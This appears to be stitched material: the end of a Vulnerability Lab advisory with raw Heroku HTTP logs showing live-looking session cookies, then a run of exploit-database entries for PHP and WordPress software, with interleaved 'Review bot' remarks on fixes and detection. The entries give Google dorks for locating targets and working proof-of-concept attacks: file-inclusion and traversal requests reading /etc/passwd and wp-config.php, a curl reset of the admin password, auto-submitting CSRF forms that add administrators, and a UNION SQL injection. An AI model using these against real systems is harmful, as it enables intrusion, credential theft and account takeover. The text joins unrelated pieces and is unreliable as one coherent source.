Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _my-heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZG--af37490991f3a343d1126f2e451efbf7744c0f9a; __utmb=148535982.65.9.1411228524365; user_session_secret=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%3D--bd9c611ce38c8221d606e59d0e41c5571aa3ef06; dashboard_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; _ga=GA1.3.181049422.1411214008; __utma=155166509.181049422.1411214008.1411228144.1411228144.1; __utmb=155166509.7.10.1411228144; __utmc=155166509; __utmz=155166509.1411228144.1.1.utmcsr=dashboard-next.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/new; visitor_id36622=273629684; flash=%7B%7D]
Connection[keep-alive]
Response Header:
Connection[keep-alive]
Server[nginx/1.5.7]
Date[Sat, 20 Sep 2014 15:56:48 GMT]
Content-Type[text/html; charset=utf-8]
Transfer-Encoding[chunked]
status[302 Found]
Strict-Transport-Security[max-age=31536000]
Location[https://dashboard.heroku.com/login]
Cache-Control[must-revalidate, no-cache, no-store, private]
Pragma[no-cache]
Expires[0]
X-Frame-Options[SAMEORIGIN]
x-ua-compatible[IE=Edge,chrome=1]
Set-Cookie[_my-heroku_session=BAh7CUkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZGSSIQcmVkaXJlY3RfdG8GOwBGIg0vYWNjb3VudA%3D%3D--3aacd80781b201de87c148efa8ef6adb5a004d99; path=/; secure; HttpOnly]
x-request-id[5e276c4f-1382-4328-ae95-b87a73376089]
x-runtime[0.006972]
x-rack-cache[miss]
Via[1.1 vegur]
17:56:39.215[207ms][total 207ms] Status: 304[Not Modified]
GET https://dataclips.heroku.com/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[dataclips.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=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--f620fe024be3e5610f3af2885c5b2758b30cffbf; __utmb=148535982.65.9.1411228524365]
Connection[keep-alive]
If-None-Match["015d655373394c49a35217e89173847e"]
Response Header:
Content-Length[0]
Connection[keep-alive]
Server[nginx/1.5.7]
Date[Sat, 20 Sep 2014 15:56:49 GMT]
status[304 Not Modified]
Strict-Transport-Security[max-age=31536000]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
X-Frame-Options[SAMEORIGIN]
Etag["015d655373394c49a35217e89173847e"]
Cache-Control[max-age=0, private, must-revalidate]
Set-Cookie[_session_id=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--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; path=/; expires=Sun, 21 Sep 2014 15:56:49 -0000; secure; HttpOnly]
x-request-id[b278f0fa-e866-4fd5-91cb-26c023746359]
x-runtime[0.027082]
Via[1.1 vegur]
17:56:48.969[192ms][total 192ms] Status: 304[Not Modified]
GET https://dataclips.heroku.com/clips/new Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[dataclips.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://dataclips.heroku.com/]
Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; __utmb=148535982.67.9.1411228524365; optimizelyPendingLogEvents=%5B%5D]
Connection[keep-alive]
If-None-Match["809917d3d9ac788b43864dd9470788d6"]
Response Header:
Content-Length[0]
Connection[keep-alive]
Server[nginx/1.5.7]
Date[Sat, 20 Sep 2014 15:56:59 GMT]
status[304 Not Modified]
Strict-Transport-Security[max-age=31536000]
X-XSS-Protection[1; mode=block]
x-content-type-options[nosniff]
X-Frame-Options[SAMEORIGIN]
Etag["809917d3d9ac788b43864dd9470788d6"]
Cache-Control[max-age=0, private, must-revalidate]
Set-Cookie[_session_id=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--1ea1df64ab1a053df5ea5a4eed8a3bda7db428a8; path=/; expires=Sun, 21 Sep 2014 15:56:59 -0000; secure; HttpOnly]
x-request-id[433e3190-bc29-4192-9a61-90754e41bb44]
x-runtime[0.029809]
Via[1.1 vegur]
Reference(s):
https://dataclips.heroku.com/
https://dataclips.heroku.com/clips/new
https://postgres.heroku.com/databases
-
https://dashboard.heroku.com/account
https://dashboard.heroku.com/login
https://id.heroku.com/logout
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure proof of the dataclip and postgres service values that are processing to use the login credentials.
The service needs to process expired sessions through all portal in the same or next request without allowing to access separtly requested section with the expired session credentials.
Security Risk:
==============
The security risk of the re-auth session bypass vulnerability in the dataclip and postgres information page is estimated as high. (CVSS 6.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
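Review bot: the severity is stated three different ways in this advisory: "Severity Level: High", "estimated as medium with a cvss ... count of 6.1" under Technical Details, and "estimated as high. (CVSS 6.1)" under Security Risk; a CVSS base score of 6.1 falls in the Medium band, so the two "high" statements should be reconciled with the score. The PoC session logs also tell a narrower story than the prose: after `GET https://id.heroku.com/logout` (Set-Cookie clears heroku_session, heroku_session_nonce and rack.session), `postgres.heroku.com/databases` and `dashboard.heroku.com/account` both answer 302 to their login pages and the postgres host clears user_session_secret and postgres_session_nonce on the follow-up /login request, whereas `dataclips.heroku.com/` and `/clips/new` answer 304 Not Modified and re-issue `_session_id` with a fresh expiry (Sun, 21 Sep 2014). Step 4 of the reproduction ("Switch back to the postgres.heroku service") and the Solution section should therefore name the dataclips application's own `_session_id` cookie as the session that survives the central logout, and the fix as invalidating that per-application session whenever the id.heroku.com session ends (single logout), rather than the generic "secure proof of the dataclip and postgres service values". Minor: postgres.heroku.com sends `Strict-Transport-Security[max-age=99; includeSubdomains]`, a 99-second HSTS lifetime next to the 31536000 used by the other hosts; that is a separate finding worth recording.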

platforms/php/webapps/37243.txt Executable file
@ -0,0 +1,31 @@
# Exploit Title: wp-imagezoom Remote Image Upload
# Google Dork: filetype:php inurl:"/wp-content/plugins/wp-imagezoom" & inurl:"?id="
# Date: 06.06.2015
# Exploit Author: T3N38R15
# Software Link: https://downloads.wordpress.org/plugin/wp-imagezoom.1.1.0.zip
# Version: 1.1.0
# Tested on: Windows (Firefox)
Linux (Firefox)
The affected file is the div_img.php it allowed anybody to upload jpg files.
/wp-content/plugins/wp-imagezoom/div_img.php?src=http://domain.com/img.jpg&cl=100&dl=100
would upload the file to the default directory :
/wp-content/plugins/wp-imagezoom/work/http_cln__sls__sls_domain.com_sls_img.jpg/
the first one is then your picture ( it is only 469x469 the rest is cut out ), the other are zoomed/cuttet version of it.
it also support a FPD :
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=
the variable org_img have the value of the current location to the work directory.
We can also delete entry's with
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=
following options are avaliable for the cmd parameter :
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delall
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delunn
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delone&src=yourwisheddeleted
http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?cmd=delovr&maxsize=size of image
Proof of concept : http://domain.com/wp-content/plugins/wp-imagezoom/div_img.php?src=http://static.zerochan.net/Frankenstein.(Noblesse).full.415661.jpg&cl=100&dl=100
Greets to Team Madleets/leets.pro & VIRkid ;)
Regards T3N38R15
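Review bot: the title "Remote Image Upload" undersells what the body documents: `div_img.php` accepts an arbitrary `src` URL, fetches it and stores the result under `/wp-content/plugins/wp-imagezoom/work/`, discloses the work-directory path via `org_img` when `src` is empty, and deletes stored entries through `cmd=delall`, `delunn`, `delone` and `delovr`, all without any mention of authentication. The root cause to state is a missing capability/nonce check on `div_img.php` (plus no validation of `src`), and the deletion and path-disclosure issues deserve their own lines in the title or description so the entry is indexed correctly. Header nits: the "Tested on" continuation line `Linux (Firefox)` lacks the `#` prefix, there is no "# Vendor Homepage" line, and the PoC uses a live third-party image URL where a placeholder host would do.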

platforms/php/webapps/37252.txt Executable file
@ -0,0 +1,23 @@
# Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
# Google Dork: inurl:"/wp-content/plugins/robotcpa/"
# Date: 09.06.2015
# Exploit Author: T3N38R15
# Vendor Homepage: http://robot-cpa.good-info.co/
# Version: 5V
# Tested on: Windows (Firefox)
Linux (Firefox)
The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.
Like that :
php://filter/resource=./../../../wp-config.php
cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
or
file:///etc/passwd
ZmlsZTovLy9ldGMvcGFzc3dk
our injection look then like that :
http://domain.com/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
and we can see the content of the passwd file.
greets to Black Sniper
Regards T3N38R15
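Review bot: the `# Version: 5V` header contradicts the title's "V5", and there is no vendor-notification or fix status, so the entry cannot be checked against a patched release. The two decoded payloads show the root cause: f.php includes whatever the base64-decoded `l` value names, and both the php://filter and file:// wrappers resolve locally, so disabling allow_url_include does not help; the fix is to never pass request data to include() and to map `l` onto an allowlisted set of files. Because the parameter is base64, detection is simple: alert on `l` values that decode to a string beginning with `php://` or `file://` or containing `../`.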

platforms/php/webapps/37253.txt Executable file

@ -0,0 +1,26 @@
# Exploit Title: Paypal Currencucy Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
Description:
proxy.php's code:
<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read any local file which
is not executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
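Review bot: the proxy.php snippet itself explains why /etc/passwd comes back in full, and the description should say so instead of "unfortunately not included": when neither marker is present, strpos() returns false (0 in arithmetic), so $left is 0 and $right equals strlen($file), and substr() echoes the whole response. The same file_get_contents() call accepts URLs, so the unauthenticated `requrl` parameter is also a server-side request forgery sink, not only a local file read; the fix is to hard-code the converter URL server-side, pass only the currency values, and require a nonce. The title misspells "Currency" as "Currencucy". Defenders can flag any proxy.php request whose `requrl` is not an absolute URL on the expected PayPal host.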

platforms/php/webapps/37254.txt Executable file

@ -0,0 +1,27 @@
# Exploit Title: Wordpress History Collection <=1.1.1 Arbitraty File
Download
# Google Dork: inurl:plugins/history-collection
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link: https://wordpress.org/plugins/history-collection/
# Version: <=1.1.1
# Tested on: Linux
I-Description:
Wordpress history collection plugin contains a file called download.php
which is not filtering the GET input, it then uses this get input value to
force the download of a file.
(download.php, line 44):
header("Content-Disposition: attachment;
filename=\"".basename($filename)."\";" );
2:Proof of concept:
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
php -r "echo @file_get_contents('
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php')
;"
Greetz:
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
MuhmadEmad, redsm0ke
By Kuroi'SH
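Review bot: the quoted line 44 does not support the claim on its own: basename() there only sanitises the Content-Disposition filename, not the path that is actually opened, so the advisory should also quote the line that reads $filename (the ../../../wp-config.php PoC is what demonstrates the traversal). The fix is to resolve the requested name with realpath(), verify it lies under the plugin's intended download directory, and add a capability or nonce check; applying basename() to the value used for the read would also stop the traversal. Title typo: "Arbitraty". In logs, `var` values containing `../` against download.php are the indicator.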

platforms/php/webapps/37255.txt Executable file

@ -0,0 +1,50 @@
# Exploit Title: Authentication Bypass in Pandora FMS
# Google Dork:
intitle:"Pandora FMS - The Flexible Monitoring System"
intitle:"Pandora FMS - el Sistema Flexible de Monitorización"
# Date: 10/06/2015
# Exploit Author: Manuel Mancera (sinkmanu) | mmancera (at) a2secure (dot) com
# Vendor Homepage: http://pandorafms.com/ <http://pandorafms.com/>
# Software Link: http://pandorafms.com/ <http://pandorafms.com/>
# Version: 5.0, 5.1
# Vulnerability Type : Authentication Bypass
# Severity : High
### Description ###
A vulnerability has been discovered in Pandora FMS that permits an unautheticated user to change the password for any Pandora user without knowing the actual user password. The vulnerability occurs at the login screen due to the session not being checked before the password is changed.
### Proof of Concept ###
URL: /index.php
Method: POST
Payload: renew_password=1&login=admin
Payload2:
renew_password=1&login=admin&password_new=newpass&password_confirm=newpass
### Exploit ###
curl -d
"renew_password=1&login=admin&password_new=newpass&password_confirm=newpass"
http://localhost/index.php <http://localhost/index.php>
### Solution ###
Apply the latest patches available at the vendor website.
####################################################################
Disclaimer
--------------------
All information is provided without warranty. The intent is to provide
information to secure infrastructure and/or systems, not to be able to
attack or damage. Therefore A2Secure shall not be liable for any direct
or indirect damages that might be caused by using this information.
####################################################################
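Review bot: the Solution section ("Apply the latest patches") names no fixed version while the header lists 5.0 and 5.1 as affected; the advisory should cite the release that adds the session check. The PoC shows a password-renewal handler on /index.php driven entirely by client-supplied `login`, `password_new` and `password_confirm`, so the fix must bind the reset either to an authenticated session or to a single-use token delivered to the account owner, never to the login name alone. Detection: unauthenticated POSTs to /index.php containing `renew_password=1`, especially with `login=admin`, are a clear indicator in web-server or proxy logs, and an unexpected admin password change in the Pandora audit log is the post-exploitation artefact.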

platforms/php/webapps/37257.txt Executable file

@ -0,0 +1,39 @@
# Exploit Title: FiverrScript CSRF Vulnerability (add New admin)
# Author: Mahmoud Gamal (@Zombiehelp54)
# Google Dork: intext:Powered by FiverrScript
# Date: 10/06/2015
# Exploit Author: Scriptolution
# Vendor Homepage: http://scriptolution.com
# Software Link: http://fiverrscript.com
# Version: 7.2
# Tested on: Windows
FiverrScript is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering), a form will be submitted
to (http://localhost/fiverrscript/administrator/admins_create.php) that
will add a new user as administrator.
Once exploited, the attacker can login to the admin panel (
http://localhost/fiverrscript/administrator/index.php)
using the username and the password he posted in the form.
CSRF PoC Code
=============
<form action="http://localhost/fiverrscript/administrator/admins_create.php"
method="post" id="main_form" name="main_form"
enctype="multipart/form-data"><input type="hidden" id="submitform"
name="submitform" value="1">
<input type="hidden" name="username" value="attackerUsername">
<input type="hidden" name="password" value="attackerPreferedPW" >
<input type="hidden" name="email" value="attackeremail@something.com">
</form>
<script>
document.forms[0].submit();
</script>
Reported to script owner.
Security Level:
================
High
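Review bot: the header lines conflict: `# Author: Mahmoud Gamal` versus `# Exploit Author: Scriptolution`, and Scriptolution is the vendor named on the following line, so the Exploit Author field should name the researcher. "Reported to script owner" gives no date or fix status. The PoC confirms the missing anti-CSRF token on admins_create.php; the fix is a per-session token verified server-side, with SameSite=Lax or Strict on the admin session cookie and re-authentication before creating administrators as additional hardening. An unexpected new row in the administrators table is the artefact to review after any suspected exploitation.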

platforms/php/webapps/37259.txt Executable file

@ -0,0 +1,87 @@
Advisory ID: HTB23260
Product: ISPConfig
Vendor: http://www.ispconfig.org
Vulnerable Version(s): 3.0.5.4p6 and probably prior
Tested Version: 3.0.5.4p6
Advisory Publication: May 20, 2015 [without technical details]
Vendor Notification: May 20, 2015
Vendor Patch: June 4, 2015
Public Disclosure: June 10, 2015
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2015-4118, CVE-2015-4119
Risk Level: High
CVSSv2 Base Scores: 5.8 (AV:N/AC:L/Au:M/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered two vulnerabilities in a popular hosting control panel ISPConfig. The vulnerabilities can be exploited to execute arbitrary SQL commands in application database, perform a CSRF attack and gain complete control over the web application.
1) SQL Injection in ISPConfig: CVE-2015-4118
The vulnerability exists due to insufficient filtration of input data passed via the "server" HTTP GET parametre to "/monitor/show_sys_state.php" script before executing a SQL query. A remote authenticated attacker can pass arbitrary SQL commands to the vulnerable script and execute them in applications database.
Successful exploitation of this vulnerability will allow an attacker to read, insert and modify arbitrary records in database and compromise the entire web application, but requires the attacker to be authenticated and to have "monitor" privileges. However, in combination with the CSRF vulnerability to which the application is also vulnerable, this vulnerability becomes exploitable by remote non-authenticated attacker.
A simple exploit below will display MySQL server version. First, use the following HTTP request to execute the SQL query:
https://[host]/monitor/show_sys_state.php?state=server&server=-1%20UNION%20SELECT%201,version%28%29%20--%202|-
After that visit the page mentioned below, the result of MySQL 'version()' function will be displayed in the HTML code of the page:
https://[host]/monitor/show_data.php?type=mem_usage
2) CSRF (Cross-Site Request Forgery) in ISPConfig: CVE-2015-4119
The vulnerability exists due to failure in the "/admin/users_edit.php" script to properly verify the origin of the HTTP request. A remote attacker can create a specially crafted web page with CSRF exploit, trick a logged-in administrator to visit this page and create a new user with administrative privileges.
A simple CSRF exploit below creates an administrative account with username "immuniweb" and password "immuniweb":
<form action = "https://[host]/admin/users_edit.php" method = "POST" enctype = "multipart/form-data">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="passwort" value="immuniweb">
<input type="hidden" name="repeat_password" value="immuniweb">
<input type="hidden" name="modules[]" value="vm">
<input type="hidden" name="modules[]" value="mail">
<input type="hidden" name="modules[]" value="help">
<input type="hidden" name="modules[]" value="monitor">
<input type="hidden" name="startmodule" value="vm">
<input type="hidden" name="app_theme[]" value="default">
<input type="hidden" name="typ[]" value="admin">
<input type="hidden" name="active" value="1">
<input type="hidden" name="language" value="en">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to ISPConfig 3.0.5.4p7
More Information:
http://bugtracker.ispconfig.org/index.php?do=details&task_id=3898
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23260 - https://www.htbridge.com/advisory/HTB23260 - Multiple vulnerabilities in ISPConfig.
[2] ISPConfig - http://www.ispconfig.org - Hosting Control Panel Software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
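Review bot: the two CVSSv2 vectors match their scores (5.8 for the authenticated SQL injection with Au:M, 7.6 for the unauthenticated CSRF chain) and the fixed version 3.0.5.4p7 is cited, so the advisory is complete; one nit is "parametre" in the SQL injection description. For defenders: the SQL injection PoC is visible in access logs as a `server` value on /monitor/show_sys_state.php containing UNION or SELECT, with the result read back from /monitor/show_data.php?type=mem_usage; a parameterised query on the `server` value is the root fix. The CSRF form targets /admin/users_edit.php with `typ[]=admin`, so beyond upgrading, watch for new administrator accounts in the ISPConfig user table and confirm an anti-CSRF token is enforced on that script after the update.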

platforms/php/webapps/37263.txt Executable file

@ -0,0 +1,36 @@
# Exploit Title: AnimaGallery 2.6 (theme and lang cookie parametre) Local File Include Vulnerability
# Date: 2015/06/07
# Vendor Homepage: http://dg.no.sapo.pt/
# Software Link:http://dg.no.sapo.pt/AnimaGallery2.6.zip
# Version: 2.6
# Tested on: Centos 6.5,php 5.3.2,magic_quotes_gpc=off # Category: webapps
* Description
func.php
line 21 - 22:
include('themes/'.$THEME.'/templates.php');
include('languages/'.$LANG.'.php');
$lang and $THEME parametre from import_theme_lang() function.
function import_theme_lang()
{
$THEME = DEFAULT_THEME;
if(isset($_COOKIE['theme']) AND !THEME_LOCKED)
$THEME = $_COOKIE['theme']; <-- Not Taint Checking
$LANG = DEFAULT_LANG;
if(isset($_COOKIE['lang']) AND @file_exists('languages/'.$_COOKIE['lang'].'.php') AND !LANG_LOCKED)
$LANG = $_COOKIE['lang']; <--- Not Taint Checking
return(array($THEME, $LANG));
}
* Proof of Concept
curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "lang=../../../../../../../etc/passwd%00"
curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "theme=../../../../../../../etc/passwd%00"
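Review bot: the PoC depends on the environment stated in the header (PHP 5.3.2, magic_quotes_gpc=off) and the entry should say so: the `lang` branch is guarded by file_exists('languages/'.$_COOKIE['lang'].'.php'), which the %00 in the cookie truncates, and PHP 5.3.4 and later reject NUL bytes in filesystem paths; the `theme` branch has no file_exists guard but still appends '/templates.php', so it needs the same truncation. The header also lacks an Exploit Author. The fix in import_theme_lang() is to accept only values that match an allowlist (a listing of the themes/ and languages/ directories, or ^[a-zA-Z0-9_-]+$); defenders can alert on `theme` or `lang` cookie values containing `../` or %00.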

platforms/php/webapps/37264.txt Executable file

@ -0,0 +1,76 @@
# Title: CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted
Contact Form Wordpress Plugin v1.0.4
# Submitter: Nitin Venkatesh
# Product: Encrypted Contact Form Wordpress Plugin
# Product URL: https://wordpress.org/plugins/encrypted-contact-form/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
scripting[CWE-79]
# Affected Versions: v1.0.4 and possibly below.
# Tested versions: v1.0.4
# Fixed Version: v1.1
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1125443/
